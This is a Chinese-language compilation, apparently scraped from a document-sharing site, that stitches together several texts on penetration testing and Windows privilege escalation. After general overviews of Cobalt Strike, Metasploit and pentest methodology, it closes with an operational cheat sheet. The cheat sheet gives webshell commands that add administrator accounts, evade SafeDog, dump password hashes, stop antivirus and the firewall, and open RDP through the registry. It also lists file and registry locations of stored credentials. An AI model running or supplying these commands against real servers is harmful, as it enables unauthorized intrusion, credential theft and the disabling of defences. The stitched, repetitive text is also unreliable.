渗透测试资料--提权技巧
- 格式:pdf
- 大小:452.78 KB
- 文档页数:12
cobaltstrike提权技巧Cobalt Strike 是一款常用于渗透测试中的仿真工具,它提供了许多实用的提权技巧。
以下是一些常见的 Cobalt Strike 提权技巧:1. 使用本地管理员权限:Cobalt Strike 支持使用本地管理员权限进行文件复制、启动服务等操作。
可使用 `execute-assembly` 命令执行 .NET 程序集,或使用 `execute` 命令执行命令行命令。
2. 利用弱凭据提权:Cobalt Strike 内置了一些模块用于提权,如 `ask` 模块用于获取被攻击系统上的用户凭据。
可以使用`ask` 模块尝试获取管理员账户的凭据,并使用 `psexec` 模块或 `beacon` 的 `spawn` 命令提升权限。
3. 利用漏洞提权:Cobalt Strike 也支持利用系统漏洞进行提权。
例如,可以通过 `smb_lsa` 模块利用 MS17-010 漏洞(俗称永恒之蓝)提升权限。
4. 构建漏洞利用模块:Cobalt Strike 还支持自定义模块和脚本。
可以使用 Cobalt Strike 内置的模块开发自己的提权模块,或使用 MSF 脚本进行攻击。
5. 使用 PowerShell 提权:Cobalt Strike 内置了大量的PowerShell 功能,可以利用 PowerShell 进行提权。
可以使用`powershell-import` 命令导入 PowerShell 模块,然后通过`powershell` 命令执行 PowerShell 脚本。
需要注意的是,使用 Cobalt Strike 或其他工具进行渗透测试和提权活动时,请确保合法授权,并且遵循当地法律和道德规范。
任何未经授权的活动都是违法的,且可能会导致严重的法律后果。
自动化渗透测试方法及系统概述:自动化渗透测试是一种通过使用计算机程序和工具来摹拟黑客攻击,以评估系统的安全性和漏洞的方法。
它可以匡助组织发现和修复潜在的安全漏洞,从而提高系统的安全性。
本文将介绍自动化渗透测试的方法和系统,并提供详细的步骤和数据示例。
1. 自动化渗透测试方法:1.1 目标确定:首先,确定要进行渗透测试的目标系统。
这可以是一个网络、一个应用程序或者一个特定的服务器。
1.2 信息采集:采集关于目标系统的信息,包括IP地址、域名、网络拓扑等。
可以使用工具如Nmap、Shodan等来获取这些信息。
1.3 漏洞扫描:使用漏洞扫描工具如Nessus、OpenVAS等,对目标系统进行扫描,以发现已知的漏洞。
1.4 漏洞利用:根据扫描结果,使用合适的工具如Metasploit、Burp Suite等,对发现的漏洞进行利用,以验证其是否可以被攻击者利用。
1.5 提权和权限维持:如果成功利用了漏洞并获取了系统访问权限,进一步提升权限以获取更高的权限,并尽可能地维持权限,以摹拟真正的攻击情景。
1.6 报告生成:根据测试结果生成详细的报告,包括漏洞描述、风险评估、修复建议等,以便系统管理员和开辟人员进行修复和改进。
2. 自动化渗透测试系统:2.1 工具选择:选择合适的自动化渗透测试工具,如Metasploit、Nessus、Burp Suite等。
这些工具提供了广泛的功能,可以满足不同的测试需求。
2.2 系统配置:配置自动化渗透测试系统,包括安装和设置所选工具、配置网络环境、设置测试目标等。
2.3 脚本编写:编写自动化脚本,以便自动执行渗透测试的各个步骤。
这些脚本可以使用Python、Ruby等编程语言编写,以实现自动化和定制化的测试流程。
2.4 数据管理:建立一个数据库或者使用现有的数据管理系统,用于存储和管理渗透测试的结果和报告。
2.5 定期更新:定期更新自动化渗透测试系统,包括工具和脚本的更新、漏洞库的更新等,以保持测试的准确性和有效性。
常见提权方法1. 用户提权:用户提权是指普通用户通过某种方式获取管理员权限或超级用户权限的行为。
常见的用户提权方法包括:利用弱密码、使用系统漏洞、利用特权提升程序等。
详细描述:用户提权是黑客经常使用的一种手段,通过获取管理员权限,黑客可以执行更高级别的操作,如修改系统配置、访问敏感文件等。
利用弱密码是最常见的用户提权方法之一。
黑客可以使用密码破解工具或暴力破解技术尝试猜解用户密码,一旦成功登录系统,就可以获取管理员权限。
系统漏洞也是用户提权的常见方法之一。
黑客可以通过渗透测试或漏洞扫描等方式发现系统中的漏洞,然后利用这些漏洞获取管理员权限。
某个系统可能存在一个未修补的漏洞,黑客可以利用这个漏洞上传特制的脚本,从而获得系统的控制权。
黑客还可以利用特权提升程序来提权。
这些程序的功能是在受限的用户权限下执行特权操作,如创建新用户、修改用户组等。
黑客可以通过执行这些特权提升程序来获取管理员权限,从而获得系统的完全控制权。
2. 命令注入:命令注入是指黑客通过在输入框或URL参数中注入恶意命令,从而执行非授权的操作。
常见的命令注入方法包括:通过修改URL参数、利用操作系统命令执行漏洞等。
详细描述:命令注入是一种常见的网络攻击手法,黑客通过在输入框或URL参数中注入恶意命令,从而执行非授权的操作。
黑客可以在一个搜索框中输入特定的字符串,以执行系统命令,或是通过改变URL参数来获取系统权限。
命令注入通常利用了操作系统的命令执行漏洞。
当用户传递的输入被直接用于构造系统命令时,如果没有正确进行输入验证和过滤,黑客就可以通过构造恶意输入来执行非授权的操作。
这种攻击方式在许多Web应用程序中非常常见,如论坛、博客等。
为了防止命令注入攻击,开发者应该始终对用户输入进行适当的验证和过滤。
可以使用特定的字符过滤器来禁止或转义危险的字符,或是通过使用参数化查询和预编译语句等方式防止SQL注入。
3. 文件包含漏洞:文件包含漏洞是指黑客通过利用应用程序中的文件包含功能来执行恶意代码。
msf提权原理MSF提权原理概述:Metasploit Framework(简称MSF)是一款开源的渗透测试工具,被广泛应用于安全行业。
其中,提权是渗透测试中的重要环节之一,而MSF提供了多种方法和模块来实现提权操作。
本文将介绍MSF 提权的原理和常用方法。
一、MSF提权原理:MSF提权的基本原理是通过利用目标主机上的漏洞或弱点,获取更高权限的访问权。
MSF通过对目标主机进行渗透测试,发现目标主机上的漏洞,并利用这些漏洞来提升攻击者的权限。
二、MSF提权方法:1. 本地提权:本地提权是指攻击者已经获取了一定的访问权限,但希望进一步提升权限,以获取更高的权限。
MSF提供了一些本地提权模块,用于利用目标主机上已知的漏洞或弱点,获取更高权限的访问权。
2. 远程提权:远程提权是指攻击者通过远程方式攻击目标主机,以获取目标主机上的更高权限。
MSF提供了一些远程提权模块,用于利用目标主机上已知的漏洞或弱点,获取更高权限的访问权。
常见的远程提权方法包括利用系统服务漏洞、利用应用程序漏洞等。
3. 社会工程学提权:社会工程学提权是通过欺骗目标用户,获取目标主机上的更高权限。
MSF提供了一些社会工程学提权模块,用于利用用户的信任心理或对安全意识的漠视,获取目标主机上的更高权限。
4. 水平提权:水平提权是指攻击者通过获取局域网内其他主机的访问权,进一步提升攻击者自身的权限。
MSF提供了一些水平提权模块,用于在局域网内扩大攻击面,获取更多主机的访问权。
三、MSF提权流程:1. 信息收集:需要对目标主机进行信息收集,包括目标主机的操作系统、服务、漏洞等信息。
MSF提供了多种信息收集模块,用于获取目标主机的相关信息。
2. 漏洞扫描:根据信息收集的结果,选择合适的漏洞扫描模块,并对目标主机进行漏洞扫描。
漏洞扫描模块可以自动检测目标主机上的漏洞,为后续的提权操作提供基础。
3. 漏洞利用:根据漏洞扫描的结果,选择合适的漏洞利用模块,并对目标主机进行漏洞利用。
web渗透技巧(最新版3篇)目录(篇1)I.引言A.介绍web渗透的重要性B.本文将探讨的三个主要技巧II.获取网络信息A.端口扫描B.漏洞扫描C.社工信息收集III.攻击系统漏洞A.命令执行B.文件下载C.数据库入侵IV.防范措施A.安装防火墙B.使用复杂密码C.定期更新软件正文(篇1)随着互联网的普及,网络安全问题越来越受到人们的关注。
作为攻击者,如何渗透到目标网络并获取所需信息是至关重要的。
本文将介绍三种常用的web渗透技巧,以帮助读者更好地防范网络攻击。
1.获取网络信息在渗透过程中,获取目标网络的信息至关重要。
常见的获取网络信息的技巧包括端口扫描和漏洞扫描。
端口扫描可以发现目标网络上开放的服务端口,从而确定可攻击的系统组件。
漏洞扫描则可以检测目标系统是否存在已知漏洞,以便进行针对性攻击。
此外,社工信息收集也是获取网络信息的重要手段。
通过收集目标网络上用户的行为数据,攻击者可以更好地了解目标网络的结构和安全防护措施。
2.攻击系统漏洞一旦获取到目标网络的信息,攻击者就可以利用系统漏洞进行攻击。
在web渗透中,常见的漏洞类型包括命令执行、文件下载和数据库入侵等。
攻击者可以利用这些漏洞执行恶意代码、窃取敏感数据或控制目标网络。
为了防止这些漏洞被利用,用户应该及时更新软件,修补已知漏洞。
3.防范措施最后,为了防止web渗透攻击,用户应该采取一些防范措施。
首先,安装防火墙可以有效地防止外部攻击。
其次,使用复杂密码可以增加账户的安全性。
最后,定期更新软件可以避免已知漏洞被利用。
目录(篇2)I.渗透测试简介II.渗透测试的过程III.渗透测试的技巧IV.如何保护自己的网站正文(篇2)渗透测试是一项重要的网络安全任务,它可以帮助企业发现网站的安全漏洞,从而及时采取措施保护自己的网站。
下面是一些渗透测试的技巧:1.了解目标网站:在进行渗透测试之前,需要了解目标网站的基本信息,例如网站的结构、功能、数据库等。
网络渗透测试实践经验分享网络渗透测试是现在信息安全领域非常重要的一个环节,通过模拟黑客攻击的方式,评估网络的安全性,发现并修补网络漏洞。
作为一名网络安全从业人员,我在多次网络渗透测试实践中积累了一些经验,分享给大家。
1. 收集情报在进行渗透测试之前,需要先进行收集情报的工作,了解目标的 IP 地址、系统类型、开放的端口、CMS 程序、社会工程学信息等等,这些信息对于后续的攻击行为非常重要,可以通过开源情报收集工具,如the harvester、nmap等等收集,也可以通过搜索引擎和社交网络进行信息搜集。
2. 识别漏洞在收集信息的基础上,需要进行漏洞识别。
漏洞识别可以使用工具,如 Nessus、OpenVAS、Metasploit 等等,也可以手动进行测试。
执行端口扫描,识别出正在运行的服务及对应端口号,在确定了服务以及相应的版本之后,可以通过漏洞库进行漏洞比对,根据提示进行手动测试。
3. 信息搜集攻击者想要获得授权进入网络和系统,首先需要获取登录凭据。
在获取了操作系统和软件的版本信息之后,可以找到对应的漏洞,以获取管理员凭证。
可以使用工具进行社会工程学攻击,如Phishing、Spear Phishing 等等。
4. 提权在获取到特权用户的凭据之后,想要进一步进入系统,需要提权。
在 Windows 系统下,可以使用 Meterpreter 获取 Administrator 权限;在 Linux 系统下,则可以通过 su、sudo 等方式获取 ROOT权限。
提权过程中需要注意操作,防止路径穿越漏洞等导致系统奔溃或数据丢失。
5. 遗留成功拿到管理员凭据后,攻击者为了长期控制此网站,会留下木马以逃避监管。
有很多后门工具可以选择,让黑客可以稳定的控制被攻击机器。
使用一些常见的后门工具,如Trojan、Netcat、WebShell 等等。
6. 报告生成最后,需要将发现的安全问题进行总结,并形成详细的渗透测试报告,包括测试目的、测试范围、测试过程、测试结果、安全风险等内容。
webshell msf 提权方法
Webshell是一种可以用来执行命令的脚本,通常用于攻击者在受害者的服务器上执行恶意操作。
MSF(Metasploit Framework)是一种流行的渗透测试工具,可以用于执行各种攻击和提权操作。
以下是使用MSF进行Webshell提权的一般步骤:
1. 获取Webshell:首先,攻击者需要将Webshell上传到受害者的服务器上。
这可以通过多种方式完成,例如通过文件上传漏洞、利用Web应用程序漏洞或其他漏洞。
2. 扫描目标:一旦Webshell上传成功,攻击者可以使用MSF的扫描器来扫描目标服务器的漏洞和弱点。
这可以帮助攻击者确定哪些用户和系统具有潜在的提权机会。
3. 执行攻击:一旦攻击者确定了潜在的提权机会,他们可以使用MSF的各种攻击模块来尝试提权。
这可能包括利用系统漏洞、使用缓冲区溢出攻击、执行命令注入等。
4. 获取权限:如果攻击成功,攻击者将获得对目标服务器的权限。
这可能包括管理员权限或其他高权限。
需要注意的是,这些步骤只是一个一般性的概述,并且实际情况可能因目标系统和环境而异。
此外,使用这些技术进行非法活动是非法的,并且可能导致严重的法律后果。
因此,建议仅在合法和授权的情况下使用这些技术。
常用的渗透测试方法
1. 嘿,你知道漏洞扫描吗?就像拿着一个超级放大镜去寻找系统的弱点!比如对一个网站进行全面的漏洞扫描,看看哪里可能会被黑客钻空子。
2. 社会工程学可厉害了!这就好比是对人心理的巧妙操控呀!像装作是工作人员打电话套取重要信息这种。
3. 暴力破解懂不?就像是不断地尝试打开一把锁,直到找到正确的钥匙!比如说一直尝试各种密码组合来突破系统登录。
4. 缓冲区溢出,这可危险啦!就像水装得太满要溢出来一样,可能导致系统崩溃哦!比如在程序中输入大量数据导致它出问题。
5. 跨站脚本攻击,哎呀,这就像是在别人的地盘上搞小动作!比如在网页上注入恶意脚本影响用户。
6. 提权,这可是个关键步骤!就如同从普通士兵升级成将军,获取更高权限!像从普通用户变成管理员权限。
7. 嗅探,就像个偷偷摸摸的侦探一样!比如偷偷监听网络数据包获取重要信息。
8. 注入攻击,这可是很狡猾的手段!如同在系统的血管里注入“坏东西”!像在数据库查询中插入恶意代码。
9. 后门程序,这就像是留了个秘密通道!比如偷偷在系统里植入一
个方便自己随时进入的小程序。
10. 拒绝服务攻击,哇,这可太狠了!就像让一个地方陷入混乱无法正常运作!比如让一个网站因为大量请求而瘫痪。
原创不易,请尊重原创,谢谢!。
网络安全渗透测试技术手册网络安全渗透测试技术手册是一份旨在帮助企业提高网络安全防护水平的指南。
本手册将介绍渗透测试的基本概念、流程以及常用的技术工具,以帮助企业识别和解决可能存在的安全漏洞,从而保障企业的信息资产和用户数据的安全。
一、渗透测试简介渗透测试是一种通过模拟真实攻击来评估网络安全防护强度的方法。
通过模拟黑客的攻击行为,渗透测试可以发现网络中的弱点和漏洞,并提供相应的修复建议。
渗透测试一般包括信息收集、目标确认、漏洞扫描、攻击与渗透、权限提升和结果报告等阶段。
二、渗透测试流程1. 信息收集阶段信息收集阶段旨在获取目标系统的相关信息,包括IP地址、域名、子域名、邮箱等,以便后续的漏洞扫描和攻击。
- 子域名收集:通过搜索引擎、WHOIS查询等方式获取目标域名的子域名;- 系统指纹识别:利用开源工具识别目标系统的类型和版本信息;- 端口扫描:利用端口扫描工具获取目标系统开放的端口和服务。
2. 目标确认阶段目标确认阶段是为了验证目标系统是否存在漏洞,确定渗透测试的具体方向。
- 存在漏洞验证:根据信息收集结果,使用漏洞验证工具进行漏洞验证,如Web应用漏洞扫描、脆弱性扫描等;- 用户账号爆破:通过暴力破解密码等方式验证目标系统的用户账号和密码是否安全可靠。
3. 漏洞扫描阶段漏洞扫描阶段是对目标系统进行全面扫描,寻找可能存在的漏洞。
- 代码审计:对目标系统的源代码进行审计,寻找可能存在的安全漏洞;- 漏洞扫描:使用漏洞扫描工具对目标系统进行扫描,查找常见的漏洞,如SQL注入、跨站脚本攻击等。
4. 攻击与渗透阶段攻击与渗透阶段是对目标系统进行真实的攻击,以验证系统的安全性。
- 社会工程学攻击:通过发送钓鱼邮件、伪造网站等方式进行社会工程学攻击,验证企业内部员工的安全意识;- 远程命令执行:利用系统漏洞实现远程命令执行,获取系统权限,验证系统的安全性。
5. 权限提升阶段权限提升阶段是对目标系统中权限较低的账户或者角色进行权限提升,以获取更高级别的权限。
Metasploit Framework(MSF)是一种渗透测试工具,它包括了许多模块和利用技术,其中一些专门用于在 Windows 系统上进行提权。
提权是指攻击者通过某种手
段获取更高权限的过程,通常是从普通用户升级为管理员或系统用户。
以下是一些在 Metasploit 中用于 Windows 提权的常见方法:
1.Local Exploits:
Metasploit 提供了一些本地漏洞利用模块,用于利用目标系统上的已知漏洞。
这些模块可能涉及到某些服务或应用程序的漏洞,通过这些漏洞攻击者可以
获得更高的权限。
例如:
2.Post Exploitation Modules:
Metasploit 还提供了一些用于后期渗透的模块,用于在系统上查找提权的机
会。
这些模块通常在获取初始访问权限后运行,以寻找系统中的漏洞或弱点。
例如:
3.Token Impersonation:
在 Windows 中,通过令牌伪造(Token Impersonation)技术,攻击者可以使
用已经获得的令牌来获取更高的权限。
Metasploit 提供了一些与令牌相关的
模块,用于伪造或注入令牌。
例如:
4.Exploit Suggester:
Metasploit 中的post/multi/recon/local_exploit_suggester模块用于自动检测目标系统上可能存在的提权机会。
它会分析系统信息,查找可能的本地漏洞,然后建议相应的模块。
这些只是 Metasploit 中一些常见的 Windows 提权方法,实际使用时需要根据目标系统的具体情况选择适当的模块。
### 提权技巧1.cmd拒绝访问就自己上传一个cmd.exe,自己上传的cmd是不限制后缀的,还可以是 cmd.txt cmd.rar等 user不能执行有时候是net.exe被删除了,可以先试试net1,不行就自己上传一个net.exe3.cmd执行exp没回显的解决方法:com路径那里输入exp路径C:\RECYCLER\pr.exe,命令那里清空(包括/c )输入net user jianmei daxia/add4.有时候因为监控而添加用户失败,试试上传抓取hash的工具,如PwDump7.exe,得到hash之后可以进行破解,建议重定向结果到保存为1.txtcmd /c c:\windows\temp\cookies\PwDump7.exe >1.txt,在条件允许的情况下也可以用mimikatz直接抓明文5.有时候权限很松,很多命令都可以执行,但是就是增加不上用户,这时候你就要考虑是不是因为密码过于简单或是过于复杂了6.用wt.asp扫出来的目录,其中红色的文件可以替换成exp,执行命令时cmd那里输入替换的文件路径,下面清空双引号加增加用户的命令7.有时候可以添加用户,但是添加不到管理组,有可能是administrators组改名了,使用命令net user administrator查看管理组的名字8.有的cmd执行很变态,asp马里,cmd路径填上面,下面填:"c:\xxx\exp.exe whoami” 记得前面加两个双引号,不行后面也两个,不行就把exp的路径放在cmd那里,下面不变9.当添加不上用户却可以添加“增加用户的Vbs、bat)的时候,就添加一个吧,然后用“直接使服务器蓝屏重启的东东”让服务器重启就提权成功10.菜刀执行的技巧,上传cmd到可执行目录,右击cmd 虚拟终端,help 然后setpc:\windows\temp\cmd.exe 设置终端路径为:c:\windows\temp\cmd.exe11.支持aspx但跨不了目录的时候,可以上传一个读iis的vbs,执行命令列出所有网站目录,找到主站的目录就可以跨过去了,上传cscript.exe到可执行目录,接着上传iispwd.vbs到网站根目录,cmd命令cmd /c“c:\windows\temp\cookies\cscript.exe” d:\web\iispwd.vbs11.如何辨别服务器是不是内网?192.168.x.x 172.16.x.x 10.x.x.x12.安全狗下加用户的语句::for /l %i in (1,1,1000) do @net user testtest [/add&@net]() localgroup administrators test /add13.21对应的FTP、1433对应的MSSQL、3306对应的MYSQL、3389对应的远程桌面、1521对应的Oracle、5631对应的pcanywhere14.劫持提权,说到这个,想必肯定会想到lpk.dll这类工具,有时候在蛋疼怎么都加不上账户的时候,可以试试劫持shift、添加开机启动等等思路15.提权成功但3389端口没开,执行语句或是工具开3389失败的时候,可以上传rootkit.asp,登陆进去就是system权限,这时候再尝试开3389希望较大### 常用DOS命令查看版本:ver查看权限:whoami查看配置:systeminfo查看用户:net user查看进程:tasklist查看正在运行的服务:tasklist /svc查看开放的所有端口:netstat -ano查询管理用户名:query user查看搭建环境:ftp 127.0.0.1查看指定服务的路径:sc qc Mysql添加一个用户:net user jianmei daxia.asd /add提升到管理权限:net localgroup administrators jianmei /add添加用户并提升权限:net user jianmei daxia.asd /add & net localgroup administrators jianmei /add查看制定用户信息:net user jianmei查看所有管理权限的用户:net localgroup administrators加入远程桌面用户组:net localgroup “Remote Desktop Users” jianmei /add 突破最大连接数:mstsc /admin /v:127.0.0.1删除用户:net user jianmei /del删除管理员账户:net user administrator daxia.asd更改系统登陆密码:net password daxia.asd激活GUEST用户:net user guest /active:yes开启TELNET服务:net start telnet关闭麦咖啡:net stop “McAfee McShield”关闭防火墙:net stop sharedaccess查看当前目录的所有文件:dir c:\windows\查看制定文件的内容:type c:\windows\1.asp把cmd.exe复制到c:\windows的temp目录下并命名为cmd.txt:copyc:\windows\temp\cookies\cmd.exe c:\windows\temp\cmd.txt开3389端口的命令:REG ADDHKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f查看补丁:dir c:\windows\>a.txt&(for %i in (KB952004.log KB956572.log KB2393802.log KB2503665.log KB2592799.log KB2621440.logKB2160329.log KB970483.log KB2124261.log KB977165.log KB958644.log)do @type [a.txt|@find](mailto:a.txt%7C@find) /i [“%i”||@echo] (mailto:%E2%80%9C%i%E2%80%9D%7C%7C@echo)%i Not Installed!)&del /f /q /a a.txt### 常见杀软360tray.exe 360实时保护ZhuDongFangYu.exe 360主动防御KSafeTray.exe 金山卫士McAfee McShield.exe 麦咖啡SafeDogUpdateCenter.exe 服务器安全狗### windows提权中敏感目录和敏感注册表的利用敏感目录目录权限提权用途C:\Program Files\默认用户组users对该目录拥有查看权可以查看服务器安装的应用软件C:\Documents and Settings\All Users\「开始」菜单\程序 Everyone拥有查看权限存放快捷方式,可以下载文件,属性查看安装路径C:\Documents and Settings\All Users\Documents Everyone完全控制权限上传执行cmd及expC:\windows\system32\inetsrv\ Everyone完全控制权限上传执行cmd及expC:\windows\my.iniC:\Program Files\MySQL\MySQL Server 5.0\my.ini默认用户组users拥有查看权限安装mysql时会将root密码写入该文件C:\windows\system32\默认用户组users拥有查看权限 Shift后门一般在该文件夹,可以下载后门破解密码C:\Documents and Settings\All Users\「开始」菜单\程序\启动 Everyone拥有查看权限可以尝试向该目录写入vbs或bat,服务器重启后运行C:\RECYCLER\D:\RECYCLER\ Everyone完全控制权限回收站目录。
常用于执行cmd 及expC:\Program Files\Microsoft SQL Server\默认用户组users对该目录拥有查看权限有时候该目录也存在可执行权限C:\Program Files\MySQL\默认用户组users对该目录拥有查看权限找到MYSQL目录中user.MYD里的rootC:\oraclexe\默认用户组users对该目录拥有查看权限可以尝试利用Oracle的默认账户提权C:\WINDOWS\system32\config默认用户组users对该目录拥有查看权限尝试下载sam文件进行破解提权C:\Program Files\Geme6 FTP Server\Remote Admin\Remote.ini默认用户组users对该目录拥有查看权限 Remote.ini文件中存放着G6FTP的密码c:\Program Files\\Serv-U\c:\Program Files\Serv-U\默认用户组users对该目录拥有查看权限 ServUDaemon.ini 中存储了虚拟主机网站路径和密码c:\windows\system32\inetsrv\MetaBase.xml默认用户组users对该目录拥有查看权限 IIS配置文件C:tomcat5.0\conf\resin.conf默认用户组users对该目录拥有查看权限 Tomat存放密码的位置C:\ZKEYS\Setup.ini默认用户组users对该目录拥有查看权限 ZKEYS虚拟主机存放密码的位置### 提权中的敏感注册表位置HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSSQLServer\MSSQLServer\SuperS ocketNetLib\Tcp Mssql端口HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server DenyTSConnections远程终端值为0 即为开启HKEY_LOCAL_MACHINE\SOFTWARE\MySQL AB\ mssql的注册表位置HKEY_LOCAL_MACHINE\SOFTWARE\HZHOST\CONFIG\华众主机注册表配置位置HKEY_LOCAL_MACHINE\SOFTWARE\Cat Soft\Serv-U\Domains\1\UserList\serv-u的用户及密码(su加密)位置HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\ WinStations\RDP-Tcp在该注册表位置PortNumber的值即位3389端口值HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers mysql管理工具Navicat的注册表位置,提权运用请谷歌HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters Radmin的配置文件,提权中常将其导出进行进行覆盖提权HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\MSFtpsvc\Parameters \Virtual Roots\ IIS注册表全版本泄漏用户路径和FTP用户名漏洞HKEY_LOCAL_MACHINE\software\hzhost\config\Settings\mastersvrpass华众主机在注册表中保存的mssql、mysql等密码HKEY_LOCAL_MACHINE\SYSTEM\LIWEIWENSOFT\INSTALLFREEADMIN\11星外主机mssql的sa账号密码,双MD5加密HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\MSFtpsvc\Parameters \Virtual Roots\ControlSet002星外ftp的注册表位置,当然也包括ControlSet001、ControlSet003### SQL语句直接开启3389 3389登陆关键注册表位置:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\D enyTSConnections其中键值DenyTSConnections直接控制着3389的开启和关闭,当该键值为0表示3389开启,1则表示关闭。